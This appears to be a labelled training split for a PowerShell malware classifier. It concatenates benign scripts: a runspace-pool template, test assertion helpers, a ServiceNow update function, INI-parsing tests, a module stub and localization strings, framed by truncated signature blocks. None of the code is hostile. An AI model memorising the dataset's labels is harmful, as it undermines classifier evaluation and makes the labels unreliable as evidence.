9mh2wWqYS/Q48ASjOqYw/ha54oVOff22WaoH+/Hxd9NTEU/4vlvsRIMWT0jsnNI7 # 1jVArT4Q9Bt6VShWzyqraE6SKUoZrEwBpVsI0LMg2X3hOLblC1vxM3+wMyOh97aF # Os7sFnuemtI2Mfj8qg16BZTJxXlpPurWrG+OBj4BoTDkC9AxXYB3yEtuwMs7pRWL # yxIxw/wV9THKUGm+x+VE0POLwkrSMgjulSXkpfELHWWiCVslJbFIIB/4Alv+jQJS # KAJuo9CErbm2qeDk/zjJYlYaVGMyKuYZ+uSRVKB2qkEPcEzG1dO9zIa1Mp32J+zz # W3P7suJfjw62s3hDOLk+6lMQOR04x+2o17G3LceLkkxJm41ErdiTjAmdClen9yl6 # HgMpGS4okjFCJX+CpOFX7gBA3PVxQWubisAQbL5HgTFBtQNEzcCdh1GYw/6nzzNN # t+0GQnnobBddfOAiqkzvItqXjvGyK1QwggdxMIIFWaADAgECAhMzAAAAFcXna54C # m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp # Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy # MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51 # yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY # 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9 # cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN # 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua # Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74 # kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2 # K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5 # TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk # i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q # BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri # Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC # BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl # pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB # FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y # eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA # YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU # 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny # bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw # MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp # b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm # ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM # 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW # OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4 # FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw # xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX # fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo2QjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUAFU9eSpdxs0a06JFIuGFHIj/I+36ggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOp6l1swIhgPMjAyNDA4MjkwNjQ0NDNaGA8yMDI0MDgzMDA2NDQ0M1owdDA6 # BgorBgEEAYRZCgQBMSwwKjAKAgUA6nqXWwIBADAHAgEAAgI1GzAHAgEAAgITQTAK # AgUA6nvo2wIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB # AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQAzl7EaaXSWLSmS # ErGzEsmJFfUAO8+VelYiA31jn5KCnOZoT38Hrz1yI+pNkOdyeyL56+44XqdPyj4v # ampVba0AWXTmiXOsH8qXtC78qBopcWo25spiWNtOa4lgV8xwXx0WWBcwy716k6sB # IJBms+BozI8xUzsPJIwLggzQL5jJh9s27OCc78bDlPUL2kpin/l9ih0ipb+6CAzd # i+RyB1qCBrzbRWxmMXaqJ22OxxoXthxXKK8ihg+TGsg1nUkWC+6Hl4Rz3tyVJuSx # v7LwUS0LYnLxn4rJcDwPTuIiYbKwFRIDAUEKVslCdddkrsInBVJhXkU4mhKRTf6E # YbtsE/PtMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAH2gy8malRdIsEAAQAAAfYwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqG # SIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgncqpVkS1NgEg # ESOsZX27WijgTLDZg04byXpu02WMybswgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHk # MIG9BCArYUzxlF6m5USLS4f8NXL/8aoNEVdsCZRmF+LlQjG2ojCBmDCBgKR+MHwx # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1p # Y3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB9oMvJmpUXSLBAAEAAAH2 # MCIEIA0IOYeo1gVNoiaASTvAFm51irid/4CVg8yt+Dqe/IeiMA0GCSqGSIb3DQEB # CwUABIICAMl18oa7o+9V2SKUWMekK/+nN2f1zJRU9W5BV8yIetBPZ7BDkCU6dW8q # WuQkOdHDdyVmVouOSbDzwA1IXIAj6lim6t99JTrcVxOgZpxA4wKua3hjCWSlZZi7 # j3so5nhaVk++ec5fRdVDr9cU26Rr2MP1d7rsSWFSxkcc6vyLgN/E3LvaTBqows+i # ImP941e8PytYozo88i3BfpVKugtzMPi+bIx7Yd2dlaapU8R/NgbD3KX3wjRQPEta # cW1YKo37H1VYrK2SdoM6j5V72mB56h1RHQ9bfG6lTs6hLtbIgim6xtnNuVTu8852 # JN3qze4ez0qJsVpLrgwaAEny/B12tr3LTiHUOgns7cWskhqujS+C1NC4Mn3+f9xE # m4ZTqS1uLKBwEdZRRGxBB43G4PYa+HTwDwsTvL1PuBoIojV0KzB2i2fbO02xJ8FC # ZnM1KBfVA/lebndT22MVnGp1rUCFM67WtncjoyYPpsteziRLMzR/doqIKhGEocQT # MB/boN2DEaaz+ufBYlT2fyeqfibZtnmfuwqrOf6Ms4MpatRaNL/npLbHrg921Eab # rbXZt0cvKWYckzUaafwCKOB4m0x3XymguINGAETyQhI4Mj+zUxpNahU/BwBUarJ1 # clIBzOMdOlgplZ4j1ww8QDf63AXpe77YM3K1N1FT6LAD7BUATQBM # SIG # End signature block
combined_dataset/train/non-malicious/3149.ps1
3149.ps1
[CmdletBinding()] param( [Parameter( Position=0, HelpMessage='Maximum number of threads at the same time (Default=100)')] [Int32]$Threads=100 ) Begin{ } Process{ [System.Management.Automation.ScriptBlock]$ScriptBlock = { Param( $Parameter1, $Parameter2 ) [pscustomobject] @{ Parameter1 = Result1 Parameter2 = Result2 } } Write-Verbose "Setting up RunspacePool..." Write-Verbose "Running with max $Threads threads" $RunspacePool = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspacePool(1, $Threads, $Host) $RunspacePool.Open() [System.Collections.ArrayList]$Jobs = @() Write-Verbose "Setting up Jobs..." for($i = $StartRange; $i -le $EndRange; $i++) { $ScriptParams = @{ Parameter1 = $Parameter1 Parameter2 = $Parameter2 } try { $Progress_Percent = ($i / ($EndRange - $StartRange)) * 100 } catch { $Progress_Percent = 100 } Write-Progress -Activity "Setting up jobs..." -Id 1 -Status "Current Job: $i" -PercentComplete ($Progress_Percent) $Job = [System.Management.Automation.PowerShell]::Create().AddScript($ScriptBlock).AddParameters($ScriptParams) $Job.RunspacePool = $RunspacePool $JobObj = [pscustomobject] @{ RunNum = $i - $StartRange Pipe = $Job Result = $Job.BeginInvoke() } [void]$Jobs.Add($JobObj) } Write-Verbose "Waiting for jobs to complete & starting to process results..." $Jobs_Total = $Jobs.Count Do { $Jobs_ToProcess = $Jobs | Where-Object {$_.Result.IsCompleted} if($Jobs_ToProcess -eq $null) { Write-Verbose "No jobs completed, wait 500ms..." Start-Sleep -Milliseconds 500 continue } $Jobs_Remaining = ($Jobs | Where-Object {$_.Result.IsCompleted -eq $false}).Count try { $Progress_Percent = 100 - (($Jobs_Remaining / $Jobs_Total) * 100) } catch { $Progress_Percent = 100 } Write-Progress -Activity "Waiting for jobs to complete... ($($Threads - $($RunspacePool.GetAvailableRunspaces())) of $Threads threads running)" -Id 1 -PercentComplete $Progress_Percent -Status "$Jobs_Remaining remaining..." Write-Verbose "Processing $(if($Jobs_ToProcess.Count -eq $null){"1"}else{$Jobs_ToProcess.Count}) job(s)..." foreach($Job in $Jobs_ToProcess) { $Job_Result = $Job.Pipe.EndInvoke($Job.Result) $Job.Pipe.Dispose() $Jobs.Remove($Job) if($Job_Result -ne $null) { $Job_Result } } } While ($Jobs.Count -gt 0) Write-Verbose "Closing RunspacePool and free resources..." $RunspacePool.Close() $RunspacePool.Dispose() } End{ }
combined_dataset/train/non-malicious/3360.ps1
3360.ps1
function Assert-Throws { param([ScriptBlock] $script, [string] $message) try { &$script } catch { if ($message -ne "") { $actualMessage = $_.Exception.Message Write-Output ("Caught exception: '$actualMessage'") if ($actualMessage -eq $message) { return $true; } else { throw "Expected exception not received: '$message' the actual message is '$actualMessage'"; } } else { return $true; } } throw "No exception occurred"; } function Assert-ThrowsContains { param([ScriptBlock] $script, [string] $compare) try { &$script } catch { if ($message -ne "") { $actualMessage = $_.Exception.Message Write-Output ("Caught exception: '$actualMessage'") if ($actualMessage.Contains($compare)) { return $true; } else { throw "Expected exception does not contain expected text '$compare', the actual message is '$actualMessage'"; } } else { return $true; } } throw "No exception occurred"; } function Assert-ThrowsLike { param([ScriptBlock] $script, [string] $compare) try { &$script } catch { if ($message -ne "") { $actualMessage = $_.Exception.Message Write-Output ("Caught exception: '$actualMessage'") if ($actualMessage -like $compare) { return $true; } else { throw "Expected exception is not like the expected text '$compare', the actual message is '$actualMessage'"; } } else { return $true; } } throw "No exception occurred"; } function Assert-Env { param([string[]] $vars) $tmp = Get-Item env: $env = @{} $tmp | % { $env.Add($_.Key, $_.Value)} $vars | % { Assert-True {$env.ContainsKey($_)} "Environment Variable $_ Is Required. Please set the value before running the test"} } function Assert-True { param([ScriptBlock] $script, [string] $message) if (!$message) { $message = "Assertion failed: " + $script } $result = &$script if (-not $result) { Write-Debug "Failure: $message" throw $message } return $true } function Assert-False { param([ScriptBlock] $script, [string] $message) if (!$message) { $message = "Assertion failed: " + $script } $result = &$script if ($result) { throw $message } return $true } function Assert-NotNull { param([object] $actual, [string] $message) if (!$message) { $message = "Assertion failed because the object is null: " + $actual } if ($actual -eq $null) { throw $message } return $true } function Assert-Exists { param([string] $path, [string] $message) return Assert-True {Test-Path $path} $message } function Assert-AreEqual { param([object] $expected, [object] $actual, [string] $message) if (!$message) { $message = "Assertion failed because expected '$expected' does not match actual '$actual'" } if ($expected -ne $actual) { throw $message } return $true } function Assert-NumAreInRange { param([long] $expected, [long] $actual, [long] $interval, [string] $message) if (!$message) { $message = "Assertion failed because expected '$expected' does not fall in accepted range of 'interval' of actual '$actual'" } if(!($actual -ge ($expected-$interval) -and $actual -le ($expected+$interval))) { throw $message } return $true } function Assert-AreEqualArray { param([object] $expected, [object] $actual, [string] $message) if (!$message) { $message = "Assertion failed because expected '$expected' does not match actual '$actual'" } $diff = Compare-Object $expected $actual -PassThru if ($diff -ne $null) { throw $message } return $true } function Assert-AreEqualObjectProperties { param([object] $expected, [object] $actual, [string] $message) $properties = $expected | Get-Member -MemberType "Property" | Select -ExpandProperty Name $diff = Compare-Object $expected $actual -Property $properties if ($diff -ne $null) { if (!$message) { $message = "Assert failed because the objects don't match. Expected: " + $diff[0] + " Actual: " + $diff[1] } throw $message } return $true } function Assert-Null { param([object] $actual, [string] $message) if (!$message) { $message = "Assertion failed because the object is not null: " + $actual } if ($actual -ne $null) { throw $message } return $true } function Assert-AreNotEqual { param([object] $expected, [object] $actual, [string] $message) if (!$message) { $message = "Assertion failed because expected '$expected' does match actual '$actual'" } if ($expected -eq $actual) { throw $message } return $true } function Assert-StartsWith { param([string] $expectedPrefix, [string] $actual, [string] $message) Assert-NotNull $actual if (!$message) { $message = "Assertion failed because actual '$actual' does not start with '$expectedPrefix'" } if (-not $actual.StartsWith($expectedPrefix)) { throw $message } return $true } function Assert-Match { param([string] $regex, [string] $actual, [string] $message) Assert-NotNull $actual if (!$message) { $message = "Assertion failed because actual '$actual' does not match '$regex'" } if (-not $actual -Match $regex >$null) { throw $message } return $true } function Assert-NotMatch { param([string] $regex, [string] $actual, [string] $message) Assert-NotNull $actual if (!$message) { $message = "Assertion failed because actual '$actual' does match '$regex'" } if ($actual -Match $regex >$null) { throw $message } return $true }
combined_dataset/train/non-malicious/1707.ps1
1707.ps1
function Update-ServiceNowIncident { Param ( [parameter(mandatory=$true)] [parameter(ParameterSetName='SpecifyConnectionFields', mandatory=$true)] [parameter(ParameterSetName='UseConnectionObject', mandatory=$true)] [parameter(ParameterSetName='SetGlobalAuth', mandatory=$true)] [string]$SysId, [parameter(mandatory=$true)] [hashtable]$Values, [Parameter(ParameterSetName='SpecifyConnectionFields', Mandatory=$True)] [ValidateNotNullOrEmpty()] [PSCredential]$ServiceNowCredential, [Parameter(ParameterSetName='SpecifyConnectionFields', Mandatory=$True)] [ValidateNotNullOrEmpty()] [string]$ServiceNowURL, [Parameter(ParameterSetName='UseConnectionObject', Mandatory=$True)] [ValidateNotNullOrEmpty()] [Hashtable]$Connection ) $updateServiceNowTableEntrySplat = @{ SysId = $SysId Table = 'incident' Values = $Values } if ($null -ne $PSBoundParameters.Connection) { $updateServiceNowTableEntrySplat.Add('Connection',$Connection) } elseif ($null -ne $PSBoundParameters.ServiceNowCredential -and $null -ne $PSBoundParameters.ServiceNowURL) { $updateServiceNowTableEntrySplat.Add('ServiceNowCredential',$ServiceNowCredential) $updateServiceNowTableEntrySplat.Add('ServiceNowURL',$ServiceNowURL) } Update-ServiceNowTableEntry @updateServiceNowTableEntrySplat }
combined_dataset/train/non-malicious/1180.ps1
1180.ps1
$iniPath = $null function Start-TestFixture { & (Join-Path -Path $PSScriptRoot -ChildPath '..\Initialize-CarbonTest.ps1' -Resolve) } function Start-Test { $iniPath = [IO.Path]::GetRandomFileName() $iniContent = @" [section1] option1=value1 option2 = value2 [section2] [section3] option3=v a l u e 3 [section4] option4=value4 ;another comment option5=value5 [section1] option6 = option 6 and other values = option2 = value7 [section5] option1=value8 "@ $iniContent > $iniPath } function Stop-Test { Remove-Item $iniPath } function Test-ShouldReadIniAsHashtable { $ini = Split-Ini -Path $iniPath -AsHashtable Assert-NotNull $ini Assert-IniContains -Ini $ini -Section 'section1' -Name 'option1' -Value 'value1' -LineNumber 2 Assert-IniContains -Ini $ini -Section 'section1' -Name 'option2' -Value 'value7' -LineNumber 23 Assert-IniContains -Ini $ini -Section 'section3' -Name 'option3' -Value "v`na`nl`nu`ne`n3" -LineNumber 8 Assert-IniContains -Ini $ini -Section 'section4' -Name 'option4' -Value 'value4 Assert-IniContains -Ini $ini -Section 'section4' -Name 'option5' -Value 'value5' -LineNumber 19 Assert-IniContains -Ini $ini -Section 'section1' -Name 'option6' -Value 'option 6 and other values =' -LineNumber 22 Assert-IniContains -Ini $ini -Section 'section5' -Name 'option1' -Value 'value8' -LineNumber 26 } function Test-ShouldFailIfInvalidPath { $error.Clear() $ini = Split-Ini -Path "C:\$([Guid]::NewGuid())" -ErrorAction SilentlyContinue Assert-Null $ini Assert-Equal 1 $error.Count } function Test-ShouldReturnObjectForEachValue { $ini = Split-Ini -Path $iniPath Assert-Equal 'System.Object[]' $ini.GetType() Assert-Equal 8 $ini.Length Assert-Equal 'section1.option1' $ini[0].FullName Assert-Equal 'section1.option2' $ini[1].FullName Assert-Equal 'section3.option3' $ini[2].FullName Assert-Equal 'section4.option4' $ini[3].FullName Assert-Equal 'section4.option5' $ini[4].FullName Assert-Equal 'section1.option6' $ini[5].FullName Assert-Equal 'section1.option2' $ini[6].FullName Assert-Equal 'section5.option1' $ini[7].FullName } function Test-ShouldSplitIniWithoutSections { @" name=value name2=value2 name3 = value3 "@ > $iniPath $ini = Split-Ini -Path $iniPath -AsHashtable Assert-NotNull $ini Assert-IniContains -Ini $ini -Name 'name' -Value 'value' -LineNumber 1 Assert-IniContains -Ini $ini -Name 'name2' -Value 'value2' -LineNumber 2 Assert-IniContains -Ini $ini -Name 'name3' -Value 'value3' -LineNumber 5 } function Test-ShouldSplitIniWithAndWithoutSections { @" name=value name2=value2 [section] name3 = value3 "@ > $iniPath $ini = Split-Ini -Path $iniPath -AsHashtable Assert-NotNull $ini Assert-IniContains -Ini $ini -Name 'name' -Value 'value' -LineNumber 1 Assert-IniContains -Ini $ini -Name 'name2' -Value 'value2' -LineNumber 2 Assert-IniContains -Ini $ini -Name 'name3' -Value 'value3' -Section 'section' -LineNumber 6 } function Test-ShouldSupportCaseSensitiveIniFiles { @" name = a NAME = b [section] name1 = c NAME1 = d [SECTION] name1 = e NAME1 = f "@ | Set-Content -Path $iniPath $ini = Split-Ini -Path $iniPath -AsHashtable -CaseSensitive Assert-NotNull $ini Assert-Equal 6 $ini.Count Assert-True $ini.ContainsKey('name') Assert-Equal 'a' $ini['name'].Value Assert-True $ini.ContainsKey('NAME') Assert-Equal 'b' $ini['NAME'].Value Assert-True $ini.ContainsKey('section.name1') Assert-Equal 'c' $ini['section.name1'].Value Assert-True $ini.ContainsKey('section.NAME1') Assert-Equal 'd' $ini['section.NAME1'].Value Assert-True $ini.ContainsKey('SECTION.name1') Assert-Equal 'e' $ini['SECTION.name1'].Value Assert-True $ini.ContainsKey('SECTION.NAME1') Assert-Equal 'f' $ini['SECTION.NAME1'].Value $ini = Split-Ini -Path $iniPath Assert-NotNull $ini Assert-Equal 6 $ini.Count } function Assert-IniContains { param( [Collections.Hashtable] $Ini, [string] $Section, [string] $Name, [string] $Value, [int] $LineNumber ) $key = "$Name" if( $Section ) { $key = "$Section.$Name" } Assert-True $Ini.ContainsKey( $key ) "Missing key '$key'" Assert-Equal $key $Ini[$key].FullName Assert-Equal $Section $Ini[$key].Section Assert-Equal $Name $Ini[$key].Name Assert-Equal $Value $Ini[$key].Value Assert-Equal $LineNumber $Ini[$key].LineNumber }
combined_dataset/train/non-malicious/4457.ps1
4457.ps1
function Get-PSResource { [OutputType([PsCustomObject])] [cmdletbinding(SupportsShouldProcess = $true)] Param ( [Parameter(ValueFromPipelineByPropertyName = $true, Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $Name, [Parameter(ValueFromPipelineByPropertyName = $true)] [ValidateSet('Module', 'Script', 'Nupkg')] [string[]] $Type, [Parameter(ValueFromPipelineByPropertyName = $true)] [ValidateNotNull()] [string] $MinimumVersion, [Parameter(ValueFromPipelineByPropertyName = $true)] [ValidateNotNull()] [string] $RequiredVersion, [Parameter(ValueFromPipelineByPropertyName = $true)] [ValidateNotNull()] [string] $MaximumVersion, [Parameter()] [switch] $AllVersions, [Parameter()] [switch] $Prerelease ) begin { } process { foreach ($n in $Name) { if ($pscmdlet.ShouldProcess($n)) { $PSResource = New-Object PSObject -Property @{ Name = $Name Version = "placeholder-for-module-version" Type = "placeholder-for-type" Description = "placeholder-for-description" Author = "placeholder-for-author" CompanyName = "placeholder-for-company-name" Copyright = "placeholder-for-copyright" PublishedDate = "placeholder-for-published-date" InstalledDate = "placeholder-for-installed-date" UpdatedDate = "placeholder-for-updated-date" LicenseUri = "placeholder-for-license-uri" ProjectUri = "placeholder-for-project-uri" IconUri = "placeholder-for-icon-uri" Tags = "placeholder-for-tags" Includes = "placeholder-for-includes" PowerShellGetFormatVersion = "placeholder-for-powershellget-format-version" ReleaseNotes = "placeholder-for-release-notes" Dependencies = "placeholder-for-dependencies" URL = "placeholder-for-url" Repository = "placeholder-for-repository" AdditonalMetadata = "placehodler-for-additional-metadata" } return $PSResource } } } end { } }
combined_dataset/train/non-malicious/sample_10_96.ps1
sample_10_96.ps1
ConvertFrom-StringData @' id_dpm_eventlog_activity=Gathering Eventlogs id_dpm_status_eventlogs=Running DC_DPMEventLogs.ps1 '@ # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCObuswAI1rRsqh # d7RWCZa0JfwhUGuBtHS0Hxl78v2mwqCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 